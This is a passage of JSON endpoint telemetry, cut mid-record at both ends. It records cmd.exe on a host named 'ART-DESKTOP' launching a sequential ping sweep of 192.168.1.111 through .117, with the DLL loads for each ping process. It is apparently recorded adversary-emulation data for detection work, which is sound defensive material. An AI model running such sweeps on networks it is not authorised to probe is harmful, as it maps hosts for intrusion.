"{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572516980000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "event_type": "process", - "pid": 1752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572521990000, - "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.111", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5964, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572522130000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572522140000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "event_type": "process", - "pid": 5964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572526830000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.112", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4408, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572526980000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "event_type": "process", - "pid": 4408, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572531840000, - "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.113", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7504, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572531980000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7504, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572531990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "event_type": "process", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572536990000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.114", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7652, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572537140000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "event_type": "process", - "pid": 7652, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572541830000, - "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.115", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7872, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572541980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "process", - 
"pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572546840000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.116", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3980, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572547029984, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - 
"unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "process", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572551990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.117", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7172, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572552140000, - "unique_pid": 